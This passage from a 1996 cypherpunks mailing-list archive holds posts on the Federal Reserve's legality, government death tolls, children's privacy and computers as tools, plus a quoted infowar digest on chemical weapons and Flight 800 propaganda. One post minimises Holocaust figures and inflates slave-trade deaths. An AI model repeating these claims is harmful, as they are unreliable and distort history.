> impoverished world. Most reasonable sophisticated men are happier in an
> environment that included women. One of the problems with the computer society
> is that not only is it an almost all-male society, but it's part of a little-boy
> society, part of an ongoing infantilization of the society over the past half
> century.

Most heterosexual men claim to like women, but the claim is dubious on
the part of a large percentage of men, since they really like to mostly
do "boy things", i.e., follow sports, ride motorcycles, listen to "boy
music", etc., rather than hang out with women as just friends.

I think if people were really honest, they'd admit that, by and large,
men like men and women like women.  Simple enough, eh?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Mon, 11 Nov 1996 20:54:45 -0800 (PST)
To: Doug Renner <dougr@skypoint-gw.globelle.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <Pine.3.89.9611112333.B16991-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.SUN.3.95.961111234959.13077D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Nov 1996, Doug Renner wrote:

> article nearly head-on.  However is it true that what you are saying is 
> that two fundamental premises in the article you refer to as "rabid" are 
> incorrect?  Namely:
> 
> "ARTICLE 1, SECTION 8 OF THE CONSTITUTION STATES THAT CONGRESS SHALL HAVE
> THE POWER TO COIN (CREATE) MONEY AND REGULATE THE VALUE THEREOF.

The above is a true statement.  Note however that "congress" cannot
operate the mint.  It must -- **MUST** -- delegate this duty to the
executive branch (or someone outside the legislative branch, cf. Chadha
v. U.S.) if it wants it done. Congress is free to select the type
of agent it wants to do this.  Indeed, if Congress chose to license
private mints, that would, IMHO be legal.  The point here is that the
states don't have the power to coin money.

> 
> "IN 1935 THE SUPREME COURT RULED THAT CONGRESS CANNOT CONSTITUTIONALLY
> DELEGATE ITS POWER TO ANOTHER GROUP. (Reference 22, P. 168)
> 

The above is so oversimplified as to be meaningless; anyway it's almost
certainly (mostly) wrong. It refers to a case that has never been followed
since.  There are many cases since that supply the necessary context.  I
discuss some of them in my article.  I discuss others in my student note
and in other articles availble from my homepage.

> Are these not correct?  Anyway, there were issues other than mere legality 
> discussed, including history & practicality.  Specifically, the quotes from 
> Benjamin Franklin, Thomas Jefferson, Rothschild, references to 
> Congressional Record, etc. were what had impressed me in the link 
> below.

Bah. "Mere legallity" indeed. 

> Is it an accurate statement that we are effectively paying the Fed 
> interest on the currency we carry?

No.  Unless by "effectively" you mean "during periods of inflation".  But
the currency can deflate too... e.g. in a depression. 

> Or am I just making that common but incorrect assumption that 
> unconstitutionality entails illegality?

No, I'm afraid you are making the common but incorrect assumption that
reading some part of one court case from the dustbin of history out of
context makes you a constitutional expert. 
> 
> Thanks for responding to this thread, Michael.  Your input is very much 
> valued.

You may feel differently as I get grumpier...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | Great weather here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:41 -0800 (PST)
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: How many people killed by there own governments (Was: Re: a  retort + a comment + a question = [RANT])
In-Reply-To: <3.0.32.19961111182528.00a31d70@rpcp.mit.edu>
Message-ID: <328832AF.565B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Joseph M. Reagle Jr. wrote:
> >With regard to b), governments--primarily through the use of
> >their militaries--have killed, by some counts 170,000,000, men,
> >women and children in this century alone.  Hardly the guardians
> >of freedom, in my opinion.

> Do you have a breakdown of that number? I'm working on one of my thought
> experiments and am looking for the appropriate stats:

[snip]

> Deaths by Govts. on "own people"

>   US Civil War     x M  

As a war, not genocide per se, but you could include as many as 100 million
Africans killed in the slave trade, as long as the U.S. Park Police don't
get dibs on verifying the official count.  You might also include a large
number of Chinese "laborers" in the 1800's.

>   US Native Americans

When I was in school in the 1950's and 1960's, the schools said there were
no more than 3 million N.A.'s here circa 1600 or so.  The official count
remains controversial.  BTW, since Columbus, the Conquistadores, et al
gutted much of Central and South America, include them too.

>   Hitler: Jews     6 M
>   Hitler: Others   6 M

I wouldn't even bother with these two. The numbers are not that reliable,
the topic is still way too hot for open research even today, and besides,
all sides killed probably 100 million or better in WW2, most of them from
purely terrorist bombing.  The significance of the "Holocaust" should
not have been co-opted for commercial purposes as it has, but as they
say, wishing don't make it so.

>   Stalin:         30 M

30 million is the "low" count, probably includes "hard" purges and
identifiable political prisoners and very close associates, and perhaps
some family members.  Total unjustifiable non-war homicides on the part
of the Stalin government (while Stalin in charge) may be 65 million or
thereabouts.

>   China: Cult Rev  x M

Similar comments as above - unjustifiable homicides on the behest of the
Mao government (while Mao in charge) should be about 65 million.

>   France: Rev      x M

Don't know.

Comment: The Guiness World Records were at one time or another a source
for some of this info, as was their original sources.  Do expect to see
some disinformation thrown into the "real" documents.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 00:27:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <v03007800aeade37ef979@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM -0800 11/11/96, Hal Finney wrote:

>I have two kids entering their teens, and I'm sure other list members are
>parents as well.  What can we do for our children to help them enter their
>adult lives with better chances to retain privacy?  Unicorn mentions keeping
>them absent from school on picture day, although I'm not sure how much this
>helps.  I suppose it makes it harder for an investigator to find out what
>they look(ed) like.  Then when they get old enough to drive you have a new
>problem avoiding the photo (and thumbprint) on the license.
>
>Are there other measures which parents could take while their children are
>young to get them off to a good start, privacy-wise?

I think there are two important domains of privacy to distinguish:

1. The mundane.

2, The political.

The mundane domain is what most people think of initially, Things like "How
do I keep my name out of the system?" Or the point about kids.

The fact is, hundreds of millions of names are obviously--and almost
unavoidably--in the mundane public sector. I say "almost unavoidably"
because driver's licenses and social security numbers are ubiquitous.

(Side note: Jim McCoy's suggestion that kids can be kept off the
parental-unit's tax returns and thus not get a SS number is fraught with
problems. Many schools--including public schools--use the SS number for
various internal and tracking reasons. Even if the kid is free of SS
numbers until he's a teenager--at a cost of thousands of dollars a year in
IRS deductions not taken--he'll essentially have to have an SS number in
his high school years, for a variety of reasons. Maybe this can be avoided,
but I doubt the reward is worth the hassles.)

The second category is that of the political domain. If a person can
separate himself from the comments he makes, as Alois^H^H^H^H^H Black
Unicorn has done, then it hardly matters--in an important sense--that his
True Name has a SS number on file somewhere.

This is an important distinction in discussing privacy, I think. If I had a
rug rat, I doubt I'd go to great lengths to avoid getting him or her an SS
number. If the Feds offered me a yearly savings of $1000 or more on my
taxes, I'd take it.

(Given that it's almost an inevitability that the kid would have to "enter
the system" at about the age where it really begins to matter, e.g, the age
at which he or she begins to have political beliefs.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: His and Her Anarchies
In-Reply-To: <v03007802aead19eacee0@[207.167.93.63]>
Message-ID: <32883769.FB7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 12:50 PM -0500 11/11/96, jbugden@smtplink.alis.ca wrote:
> >"Timothy C. May" <tcmay@got.net> wrote:
> >>Well, I think there clearly _is_ a gender gap on these sorts of issues.

> >Technologies that matter make daily life less obnoxious, and you can
> >leverage them all the time. The Net is going to start mattering in a
> >significant way when it relieves people of the burden of dealing with
> >the garbage inherent in the information flow of everyday life. The net
> >is going to matter when I can rely on

> Well, in the 23 years I've been on the Net in one way or another, I can
> honestly say it is _increased_ my exposure to garbage. The notion that
> computers are time-savers is fraught with problems. For some tasks, it
> clearly is.
> But for other tasks and situations, it's a time sink. I view it primarily
> as a communications mechanism, e.g., lists like this, the Web, news, etc.
> Your mileage may vary.
> Notions that computers will be widely accepted because of their
> "time-saving" powers I file right next to claims that computers will be
> useful for storing recipes and balancing checkbooks.

Huh?  Just this year, I wrote a letter to an insurance company about
some bozo who hit my car, and thought he'd get away with it.
The computer allowed me to keep re-editing the letter until it was
perfected, which task would have been not feasible or simply would not
have been done manually, for what should be obvious reasons.
I won my case, and the other guy is suffering those nasty payments...
I even beat the CHP on that one....

Three to four years ago, I used my computer to edit my cover letters and
resumes, to perfect them, to send out to hundreds of potential employers,
which resulted in my getting the exact job I wanted (which now pays very
well), in spite of the fact that I started looking in L.A. just when the
riots commenced, at the same time that tens of thousands of "technical"
people were laid off from various defense contractors.

Of course, I used my computers to perfect certain computer skills (for
which I never went to College) which landed me a whole series of nice
jobs from 1979 through 1992, but that doesn't count, right?

I hesitate to admit this, but the bottom line is that the computer is
a tool that can give one person an advantage over another, for which
messaging and communications is just incidental.  Since we are in fact
an animal predator (as humans), I don't think you have to have a whole
lot of imagination to understand where that goes...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chang You Shim <cyshim@asiaonline.net>
Date: Mon, 11 Nov 1996 08:51:23 -0800 (PST)
To: Murray Hayes <mhayes@infomatch.com>
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <Pine.GSO.3.92.961112005022.21112A-100000@mail>
MIME-Version: 1.0
Content-Type: text/plain


please put me off the list




On Mon, 11 Nov 1996, Murray Hayes wrote:

>
> As far as bit patterns go, is executable code random?
>
> mhayes@infomatch.com
>
> It's better for us if you don't understand
> It's better for me if you don't understand
>                                              -Tragically Hip
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chang You Shim <cyshim@asiaonline.net>
Date: Mon, 11 Nov 1996 08:54:31 -0800 (PST)
To: "Mark M. Lacey" <mml@halcyon.com>
Subject: Re: GAK?
In-Reply-To: <01BBCF69.4C261320@blv-pm105-ip27.halcyon.com>
Message-ID: <Pine.GSO.3.92.961112005038.21112B-100000@mail>
MIME-Version: 1.0
Content-Type: text/plain


Please put me off the list




On Mon, 11 Nov 1996, Mark M. Lacey wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Could someone please fill me in on what GAK stands for
> since it seems to be central to some of the on going
> conversations.
>
> Thanks,
>
> Mark M. Lacey <mml@halcyon.com>
> "Speaking for nobody but myself."
> [Finger mml@halcyon.com for my PGP public key.]
> [If you don't have 'finger', e-mail me for it.]
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
>
> iQEVAwUBMobmyB/Hx+OuZC/tAQGRTAf/R2t+/JC1k3lhQcqIcRWO2HyxHgf6+ko2
> 2ngQBXyMrInQtaXorcZ2LFrfie4GD68S0nLWKlwqaN09+/O72Bze1pyGd3dHBI4b
> vazgQZq1zxWuHcCYg1r5QDwt0NJOZg4tRHROHmUiuLLeNfFwusWPnW+RMI2nTo39
> g/sXWhRUF83vhyztC5+zOKmxjEQOBf3Wxq0FLBAoSUjzuJKnRNV87Fnf2vzezqc4
> cK+A8DcRN0c0kX/LuNO9pnXo+3J8gMMDsoZAOS5KAgWQjJT3fdroTLX4xmRcBVJ3
> NanTSXWsFIMlnXAjBS7V+5S/3gAml+y5tqLiNJAhoVVD/nvyvQDmAg==
> =QyM4
> -----END PGP SIGNATURE-----
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chang You Shim <cyshim@asiaonline.net>
Date: Mon, 11 Nov 1996 08:52:53 -0800 (PST)
To: list <list@infowar.com>
Subject: Re: infowar Digest for 10 Nov 1996
In-Reply-To: <199611110511.VAA01029@toad.com>
Message-ID: <Pine.GSO.3.92.961112005151.21112F-100000@mail>
MIME-Version: 1.0
Content-Type: text/plain


Please put me off from the list.





On Mon, 11 Nov 1996, list wrote:

>                        infowar Digest for 10 Nov 1996
>
> Topics covered in this issue include:
>
>    1: RE: Chemical Warfare Agents
>              by alm@io-online.com
>    2: Propaganda and TWA/CIA-Cocaine
>              by winn@infowar.com
>
>
>
> --------------------------------------------------------------------------
> 1                                Message:0001                            1
> --------------------------------------------------------------------------
> To: infowar@infowar.com
> From: "Betty G. O'Hearn" <betty@infowar.com>
> Subject: Infowar Digest  Vol. 1  # 1
>
>
> infowar@infowar.com
>
>                      Sunday, November 10 1996    Volume 01: Number 01
>
>                                        We thank our sponsors:
>
> National Computer Security Association
> OPEN SOURCE SOLUTIONS Inc.
> New Dimensions International - Security Training
> Secure Computing Corporation
> HOMECOM Communications
> Internet Security Solutions
> ___________________________________________________________
>
> Infowar@infowar.com is brought to you in the  the interest of an open,
> unclassified exchange of information and ideas as a means for advancement of
> Information Warfare related issues.   Topics of discussion for this list
> include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques,
> Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD.
>
> As the list expands we will adapt to the needs and desires of our subscribers.
>
> This is a DIGEST format.
> ________________________________________________________________
>
> Contents of this Digest:               Volume 01: Number 01
>
> Infowar@infowar.com   Chemical Warfare Agents
> Infowar@infowar.com   Iraq   WMD
> Infowar@infowar.com   RE: Chemical Warfare Agents
>
> ----------------------------------------------
>
> To:        Wilson, Gary, COL, OSD/RA  GWilson@osd.pentagon.mil
> Cc:         betty@infowar.com
> Subject:  Re: Chemical Warfare Agents
>
> Chemical Warfare Agents
> An overview of chemicals defined as chemical weapons
>
> >> Main Groups
> >>
> >>     Nerve Agents
> >>     Mustard Agents
> >>     Hydrogen Cyanide
> >>     Tear Gases
> >>     Arsines
> >>     Psychotomimetic Agents
> >>     Toxins
> >>     Potential CW Agents
> >>
> What is a Chemical Warfare Agent?
>
> A United Nations report from 1969 defines chemical warfare agents as " ...
> chemical substances, whether gaseous, liquid or solid, which might be
> employed because of their direct toxic effects on man, animals and plants
> ... ".
> The Chemical Weapons Convention defines chemical weapons as including not
> only toxic chemicals but also ammunition and equipment for their
> dispersal.  Toxic chemicals are stated to be " ... any chemical which,
> through its
> chemical effect on living processes, may cause death, temporary loss of
> performance, or permanent injury to people and animals". Plants are not
> mentioned in this context.
>
> Toxins, i.e., poisons produced by living organisms and their synthetic
> equivalents, are classed as chemical warfare agents if they are used for
> military purposes. However, they have a special position since they are
> covered by the Biological and Toxin Weapons Convention of 1972. This
> convention bans the development,production and stockpiling of such
> substances not required for peaceful purposes.
>
> Today, thousands of poisonous substances are known but only a few are
> considered suitable for chemical warfare. About 70 different chemicals
> have been used or stockpiled as CW agents during the 20th century. Today, only
> a few of these are considered of interest owing to a number of demands that
> must be placed on a substance if it is to be of use as a CW agent.
>
> A presumptive agent must not only be highly toxic but also "suitably
> highly toxic" so that it is not too difficult to handle. The substance
> must be capable of being stored for long periods in containers without
> degradation and without corroding the packaging material. It must be
> relatively resistant to atmospheric water and oxygen so that it does not
> lose effect when dispersed. It must also withstand the heat developed when
> dispersed.
> >>
> "War Gases" are Seldom Gases
> >>
> CW agents are frequently called war gases and a war where CW agents are
> used is usually called a gas war. These incorrect terms are a result of
> history. During the First World War use was made of chlorine and phosgene
> which are gases at room temperature and normal atmospheric pressure. The
> CWagents used today are only exceptionally gases. Normally they are liquids
> or solids. However, a certain amount of the substance is always in
> volatile form (the amount depending on how rapidly the substance evaporates)
> and the gas concentration may become poisonous. Both solid substances and
> liquids can also be dispersed in the air in atomized form, so-called
> aerosols. An aerosol can penetrate the body through the respiratory organs
> in the same way as a gas. Some CW agents can also penetrate the skin. This
> mainly concerns liquids but in some cases also gases and aerosols. Solid
> substances penetrate the skin slowly unless
> they happen to be mixed with a suitable solvent.
>
> Effects on Vegetation
>
> Flowers and leaves of some plants may change colour if they are exposed to
> droplets of a CW agent in an attack. Light or matt spots may occur as well
> as brown discoloration, particularly on leaves. Entire trees, or parts of
> them, may also get brown discoloration in situations of strong exposure.
> The discoloration often arises within a few minutes but may also occur
> after some days.
>
> Classification
>
> CW agents can be classified in many different ways. There are, for
> example, volatile substances, which mainly contaminate the air, or persistent
> substances, which are involatile and therefore mainly cover surfaces.
> CW agents mainly used against people may also be divided into lethal and
> incapacitating cathegories. A substance is classified as incapacitating if
> less than 1/100 of the lethal dose causes incapacitation, e.g., through
> nausea or visual problems. The limit between lethal and incapacitating
> substances is not absolute but refers to a statistical average. In
> comparison, it may be mentioned that the ratio for the nerve agents
> between the incapacitating and lethal dose is approximately 1/10. Chemical
> warfare agents are generally also classified according to their effect on the
> organism.
>
> In order to achieve good ground coverage when dispersed from a high
> altitude with persistent CW agents the dispersed droplets must be
> sufficiently large to ensure that they fall within the target area and do
> not get transported elsewhere by the wind. This can be achieved by
> dissolving polymers (e.g., polystyrene or rubber products) in the CW agent
> to make the product highly-viscous or thickened. The result will be that
> the persistence time and adhesive ability increase which thus complicates
> decontamination.
>
> Although it may appear that a CW agent can be "custom-made" for a certain
> purpose, this is not the case. Instead, there is always some uncertainty
> about the persistence time, the dispersal and the effect.
>
> These Military Chemicals are Not Considered to be Chemical Weapons
>
> Incendiary agents such as napalm and phosphorus are not considered to be
> CW agents since they achieve their effect mainly through thermal energy.
> Certain types of smoke screen may be poisonous in extremely high
> concentrations but, nonetheless, smoke ammunition is not classed as a
> chemical weapon since the poisonous effect is not the reason for their
> use. Plants, microorganisms, algae, etc. which produce toxins are not classed
> as chemical weapons even if the produced toxins belong to that class.
> Pathogenic microorganisms, mainly viruses and bacteria, are classed as
> biological weapons.
>
> --------------------------------------
>
> From:   "Wilson, Gary, COL, OSD/RA" <GWilson@osd.pentagon.mil>
> Subject:  Iraq: WMD
> Date:      Fri, 1 Nov 1996 08:24:37 -0500
>
>    WASHINGTON (AP) -- Before and during the 1991 Persian Gulf War, truck
> convoys carried Iraqi chemical and biological weapons, as well as nuclear
> material to safe haven in Iran, according to U.S. intelligence documents.
> >   "The trucks were camouflaged with mud during their travel through Iraqi
> >territory," said the report placed Thursday on the Internet. "The convoy moved
> >only at night. The mud was washed off after re-entry into Iranian territory."
> >   The report said "at least 14 trucks were identified as having nuclear,
> >biological and chemical cargo. Boxes labeled 'tularemia,' 'anthrax,'
> 'botulinum' and 'plague' were loaded into containers."
> >   The trucks were driven by Iranian civilians who turned them over to Iranian
> >Revolutionary Guards.
> >   That account was among more than 200 documents placed on the Internet over
> >the objections of the CIA. They were put on the worldwide computer network by
> >publisher Bruce W. Kletz, who plans to put out a book by a former CIA analyst,
> >Patrick Eddington.
> >   Eddington asserts that the agency has hidden evidence that American troops
> >were exposed to Iraqi chemical weapons.
> >   "These documents are still under review," CIA spokesman Mark Mansfield said.
> >"We consider portions of them to be classified."
> >   The Pentagon originally put the material on the Internet and then
> withdrew it in February when the CIA objected to making it public.
> >   While numerous studies have found no conclusive evidence that Iraqi forces
> >used chemical or biological weapons against U.S. troops during the 1991 war, it
> >is feared U.S. forces could have been exposed to nerve gas as they destroyed an
> >Iraqi munitions dump after the war's end.
> >   Iraq's transfer of material to Iran was a new example of cooperation between
> >two countries that fought an eight-year war but became covert allies when a
> >U.S.-led coalition demanded that Iraq withdraw forces that occupied Kuwait in
> >August 1990.
> >   During the ensuing Persian Gulf War, Iran allowed Iraqi planes to land
> on its territory to escape destruction by coalition forces. The planes were not
> allowed to rejoin the Iraqi military during the conflict.
> >   The documents did not shed new light on whether U.S. forces came into
> contact with Iraqi chemical weapons. But they did show the concern about Iraq's ability to manufacture and deploy such weapons.
> >   One document cited a defector's account that "at least one chemical company
> >is attached to each (Iraqi) division."
> >   Russia may have supplied biological warfare technology to Iraq and North
> >Korea, according to a report written in 1994. "It was believed that the
> >technology transfer commenced several years prior to April 1992 and was
> still in progress during April 1992," the report said.
> >   The material also indicated the government had evidence that Iraq had moved
> >chemical weapons into Kuwait.
> >   One report in January 1991, from an Iraqi national, said that chemical land
> >mines had been loaded for shipment to Kuwait. The report said the information
> >"cannot be confirmed."
> >   In September 1990, less than two months after Iraq occupied Kuwait, evidence
> >was seen that "Iraqi forces may be conducting chemical decontamination
> >exercises. They could be preparing for a chemical attack."
> >   During the same period, when the United States and its allies were massing
> >forces in the Persian Gulf region, U.S. officials were concerned that
> terrorists
> >allied with Iraqi President Saddam Hussein would stage attacks on allied
> forces.
> >
> >   Among the records returned to the Internet is a Nov. 3, 1995, memo
> written by Paul Wallner, a Pentagon official heading an oversight panel dealing with Gulf War veterans' illnesses.
> >   Noting that various military officials and departments had "expressed
> concern about potential sensitive reports or documents on GulflINK," the Persian Gulf War web site, Wallner recommended certain steps to "allow the investigation
> team time to begin preparation of a response on particular 'bombshell' reports."
> >   According to the memo, a host of material would be subject to further
> review, including "documents containing releasable information which could
> embarrass the government or DoD," the Department of Defense.
> >   It also warned that additional scrutiny would be needed on documents "that
> >could generate unusual public/media attention" or those "which seem to confirm
> >the use or detection of nuclear, chemical or biological agents."
>
> -------------------------------------------------------
> Notes from Moderator:
>
> 1. GulfLINK documents can now be downloaded from infowar.com
>
> 2. WEAPONS OF MASS DESTRUCTION IN TERRORISM
> The Emerging Threat Posed by Non-State Proliferation, James K. Campbell is an interesting read.  The article is posted on infowar.com under the What's New section.
>
> --------------------------------------------------------
>
> ate: Tue, 29 Oct 1996 12:22:27 -0700
> To: winn@Infowar.Com
> From: alm@io-online.com
> Subject: RE: Chemical Warfare Agents
> Cc: "Wilson, Gary, COL, OSD/RA" <GWilson@osd.pentagon.mil>,
>  betty@infowar.com, 'Ron Lewis' <INTELLIGYST@worldnet.att.net>
>
> I think we have an excellent example of the psychological impact of
> chemical weapons in the case of Israel right now.  The news statements
> about land for peace in the Golan came shortly after new gas masks were
> issued in Israel and I got curious.  I went back and checked the news
> database and found that speeches recomending not serving in the IDF, that
> students should leave Israel, and a wide variety of other self defeating
> actions peaked at about one week after news of chemical weapons threats,
> issueing of gas masks, and other news of this type appeared in the papers
> there.  This comes after a long period of stress and being on high alert.
> Early reactions seem to be panic, after a period of such stress it seems
> make people (at least in this situation) turn in on themselves, willing to
> abandon strongly held beliefs, etc. without knowingly tieing it to the
> threats.  The attacks seemed aimed not at the threats but at the government
> of Israel; yet, they are tied time-wise to increased pressure.  This was
> traced over a two year period which gives some validity rather than a
> one-time relationship.
>
> I hate to say it, but this is an excellent laboratory for a variety of such
> studies as it isn't artificial and its one of the few places where open
> information is available on on-going threats of various types.
> Sociologists have already done studies on behavior in society and such
> using this lab.
>
> Alijandra
> ------------------------------------------------------
>
> END
>
> Infowar             Sunday, November 10 1996        Volume 01: Number 01
>
>
> DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
> in the subject line.
>
> Subscribe infowar        TO JOIN GROUP
> Unsubscribe infowar    TO LEAVE GROUP
> Help infowar               TO RECEIVE HELP
> TO POST A MESSAGE:  E-Mail to   infowar@infowar.com
>
> _____________________________________________________
> Infowar.Com
> Interpact, Inc.
> Winn Schwartau
> winn@infowar.com
> http://www.infowar.com
> 813-393-6600  Voice
> 813-393-6361  FAX
>
> Sponsor Opportunities/Comments/Help
>
> Betty G. O'Hearn
> Assistant to Winn Schwartau
> http://www.infowar.com
> betty@infowar.com
> 813-367-7277  Voice
> 813-363-7277  FAX
>
>
>
> --------------------------------------------------------------------------
> 2                                Message:0002                            2
> --------------------------------------------------------------------------
> To: infowar@infowar.com
> From: "Betty G. O'Hearn" <betty@infowar.com>
> Subject: Infowar Digest  Vol. 1  #2
>
>
> infowar@infowar.com=20
>
>              Sunday, November 10  1996  Volume 01: Number 02
>
>                                We thank our sponsors:
>
> National Computer Security Association
> OPEN SOURCE SOLUTIONS
> New Dimensions International - Security Training
> Secure Computing Corporation
> HOMECOM Communications
> Internet Security Solutions
> __________________________________________________
> Infowar@infowar.com is brought to you in the  the interest of an open,=
>  unclassified exchange of information and ideas as a means for advancement=
>  of Information Warfare related issues.   Topics of discussion for this list=
>  include:  Infowar, Electronic Civil Defense, Hacking, Defensive Techniques,=
>  Policy, Non-Lethals, Psyops, Chemical Warfare Agents and WMD.=20
>
> As the list expands we will adapt to the needs and desires of our=
>  subscribers.=20
>
> This is a DIGEST format.
> __________________________________________________________
>
> Contents  Vol. #1  No.2
>
> infowar   Original Allegations - Flt 800 Disaster
> infowar   Propaganda and TWA/CIA-Cocaine
> infowar   Electronic Civil Defense
>
> -------------------------------------------
> To: winn@Infowar.Com
> Date: 8 Nov 1996 14:33:38 CST
> Subject: Original Allegations - Flt. 800 Disaster
>
> ENN Special Report
> 11/08/96 - 13:45CST
>
> Original Allegations of Friendly Fire Came From Alleged Iranian
> Propagandist
>
> (ENN) In light of yesterday's statements by former JFK Press Secretary
> Pierre Sallinger, the Emergency Response & Research Institute conducted
> an internal literature review of documents regarding the TWA Flight 800
> disaster.  This internal probe included e-mail, newsgroup postings,press=
>  reports, and consultations with experts, received from numerous sources. =
>  It revealed that the original allegations of a U.S. Naval "friendly fire=
>  incident" came from an alleged Iranian/Extremist Moslem propagandist named=
>  Parveez Syad, aka Parveez Hussein, who was operating from a base in=
>  Birmingham, England at the time.  Interestingly, Mr.Hussein/Syad=
>  distributed these allegations widely on the Internet within 48 hours of the=
>  incident and made what appeared to be premature accusations that the United=
>  States was already engaged in a "cover-up."
>
> Mr. Hussein/Syad's current whereabouts are unknown, and it is believed
> that he may have been the subject of a government investigation in
> England. Concerns were raised, at the time, by ERRI analysts that Mr.
> Syad/Hussein may have been engaged in an "disinformation" campaign in an=
>  effort to deflect attention from possible moslem extremist involvement
> in the bombing of Flt. 800. Subsequent inquiries and examinations by
> ERRI seem to verify that there was a concerted "foreign" effort to obscure=
>  and confuse a number of issues involved in the Flt. 800 investigation.
>
> Speculation continues among experts in regard to the authenticity of the
> alleged U.S. government documents that are reportedly in the possession
> of Mr. Sallinger. Without examination of these documents, ERRI analysts
> say that further confirmation of Mr. Sallinger's statement is difficult
> at best. One purposefully unidentified consultant told ENN that it is
> even possible that Mr. Sallinger and French intelligence agents may have
> been "duped" by a "foreign effort."
>
> U.S. Navy and FBI officials have both "catagorically denied" any viable
> evidence of a "friendly fire" incident or of any sort of "cover-up" on
> the part of the U.S. government. James Kallstrom announced today that he
> would welcome any additional information or evidence that Mr. Sallinger
> or others might have in regard to the Flight #800 tragedy.
>
> EmergencyNet News Service (ENN)
> Emergency Response & Research Institute (ERRI)
> 6348 N. Milwaukee Ave., #312
> Chicago, IL. 60646
> (773) 631-3774 - Voice
> (773) 631-4703 - Fax
> (773) 631-3467 - Modem/Emergency BBS On-Line
> -------------------------------------
>
> Date: Fri, 8 Nov 96 16:26 EST
> From: Michael Wilson <0005514706@mcimail.com>
> To: G-TWO List Members <g-two@majordomo.netcom.com>
> Subject: Propaganda and TWA/CIA-Cocaine
>
> Many of you may be dealing with questions regarding the two matters, so
> I thought I would make this available to you.
>
> ---
> Two recent events in the media are prompting my writing a very brief=
>  commentary:
> allegations of a cover-up in the TWA Flight 800 disaster and the alleged=20
> CIA-Cocaine connection into the L.A. urban environment. My comments will be=
>  directed at the propaganda value of these media events, as I'm currently=
>  engaged in writing a primer on propaganda, and these make interesting case=
>  studies.
>
> Modern propaganda comes in many forms, but of primary concern in these two=
>  cases are:
> - 'Mobile truth,' or the reinterpretation of events (revisionist history), a=
> =20
> common feature on the Internet, which is increasingly becoming an entry=
>  point into the more conventional media;
> - Psyops in support of operations, including spin control, after action=
>  reports,or informative accounts when the media is controlled by=
>  intelligence and law enforcement;
> - The digital nature of media--text, photographs, video, audio--has=
>  undermined the ability to establish the reality of what they represent as=
>  observational proxies. This has recently been termed the 'fictive=
>  environment' by the military, and I'll use the term for lack a better one.
>
> Let me discuss the two cases in terms of these points:
>
> TWA 800
> Ever since Flt. 800 went down, the conspiracy theorists have been out on the=
>  Internet, alleging everything from a Syrian missile to a 'friendly fire'=20
> accident. Part of these allegations have been blind assertions, but some=
>  have=20
> been backed up with 'proof' that entails supposed photographs and internal=
> =20
> government documents.
>
> Mobile truth: in the absence of public facts or knowledge, speculation has=
>  run wild. As usual, everyone's favorite pet suspect emerges--terrorists,=
>  the U.S. Navy, government cover-ups, etc. This 'playing to the audience'=
>  has received wide audience and coverage, because it is media hot--it=
>  attracts a lot attention simply because it receives attention in the=
>  viewers, readers, etc. in a self-fulfilling way. It plays on public and=
>  hidden fears; provides simple=20
> solutions; gives an enemy to hate, react against; it justifies the beliefs=
>  and=20
> agenda of many. The only solution is to provide facts, hopefully answers; of=
> =20
> course, this is antithetical to the investigatory (scientific and criminal)=
> =20
> process. This vacuum of data is being capitalized on by individuals or=20
> organizations who know that the official channels are going to be closed to=
>  the public--their motive is something I have no desire to quantify.
>
> PsyOps: this game is lose-lose for everyone; the public is confused and=
>  angered, the investigation is hampered or discredited, the sources of the=
>  false information will eventually be shown to be wrong (although they will=
>  launch secondary operations to manage this as well, alleging further=
>  cover-up, conspiracy, and so forth). What happens though is a continual=
>  lessening of the resistance in the information environment to future psyops=
>  operations, and this is the long term benefit sought by the perpetrators.=
>  Confidence in the government is at an all time low--post Viet Nam,=
>  Watergate, Iran-Contra, Whitewater, etc. The readiness to believe the worst=
>  becomes greater and greater, and public mental health suffers.
>
> Fictive environment: while ground truth comes from direct observation, we're=
